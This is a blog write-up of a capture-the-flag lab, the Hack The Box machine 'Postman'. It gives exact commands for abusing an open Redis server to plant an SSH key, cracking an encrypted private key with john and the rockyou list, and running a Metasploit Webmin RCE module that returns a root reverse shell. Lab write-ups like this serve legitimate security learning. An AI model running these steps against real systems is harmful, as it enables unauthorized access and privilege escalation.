HTB: Postman (Linux Machine)13 Mar 2020
Hack The Box - “Postman” - Linux - 10.10.10.160
Completed: December 7th, 2019
Retired: March 12th, 2020
Foothold / User
Nmap scan of all ports turned up a couple of interesting clues:
- Redis running on port 6379 (lots of info online about a pertinent vulnerability)
- Webmin v1.91 (also lots of info online about the vuln there) on port 10000
I wasn’t too familiar with redis, but did enough digging to come up with a way of accessing redis-cli on the server.
ssh-keygen -t rsa (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt redis-cli -h 10.10.10.160 flushall cat key.txt | redis-cli -h 10.10.10.160 -x set crackit redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh/ redis-cli -h 10.10.10.160 config set dbfilename "authorized_keys" redis-cli -h 10.10.10.160 save
ssh -i /root/.ssh/id_rsa [email protected]
After a few attempts (there were other people using the machine), I gained access to [email protected]
With the Redis user, I was able to poke around quite a bit. I could look in the “Matt” user folder and saw the “user.txt” flag I needed, but couldn’t access it without his creds. Under /opt/, there was an encrypted rsa key backup named “id_rsa.bak”, which I copied over to my own machine to crack.
From previous experience I was already familiar with ssh2john, which can convert rsa keys to a format that can be passed to john the ripper, so I used it to crack the key backup. Running it and saving the output looked like this:
python ssh2john.py matt.key > output.hash cat output.hash matt.key:$sshng$0$8$73E9CEFBCCF5287C$1192$25e840e75235eebb0238e56ac96c7e0bc…
With this output hash, I could run it through john against the typical rockyou list and get the final password:
[email protected]:~/tools └──> john --wordlist=/usr/share/wordlists/rockyou.txt output.hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes Cost 2 (iteration count) is 2 for all loaded hashes Will run 2 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status computer2008 (matt.key) 1g 0:00:00:08 DONE (2019-12-06 23:24) 0.1124g/s 1613Kp/s 1613Kc/s 1613KC/sa6_123..*7¡Vamos! Session completed
Since I was still logged in as the Redis user on another terminal, a simple “su Matt” using the “computer2008” password worked as a pivot. From there I had access to the user flag.
Getting root was very straightforward, since I was already aware of a vulnerability in Webmin 1.91 which involved priv escalation while installing packages. With my user credentials for the Webmin portal (Username: Matt, Password: computer2008) I was able to open a port locally with netcat and run the exploit (I know, I know):
msf5 > use exploit/linux/http/webmin_packageup_rce set RHOSTS 10.10.10.160 set SSL true set LHOST 10.10.XX.XX set USERNAME Matt set PASSWORD computer2008 msf5 exploit(linux/http/webmin_packageup_rce) > run [*] Started reverse TCP handler on 10.10.XX.XX:4444 [+] Session cookie: ffa3708422108ae96701bbfc53621920 [*] Attempting to execute the payload... [*] Command shell session 1 opened (10.10.XX.XX:4444 -> 10.10.10.160:56646) at 2019-12-06 23:31:46 -0700 id uid=0(root) gid=0(root) groups=0(root) cat /root/root.txt a2577<snip>6ddce
Overall the machine was fairly simple and straightforward. I was a little sad to see it get retired, since I think it’s a great machine for anyone at any skill level, with the possibility of self-imposed restrictions available to make it more challenging (i.e. no msf). Hopefully it was replaced with a comparable machine (haven’t checked it out yet).
Questions? Comments? Reach out!
You can find all of my projects and more on my Github or my main website.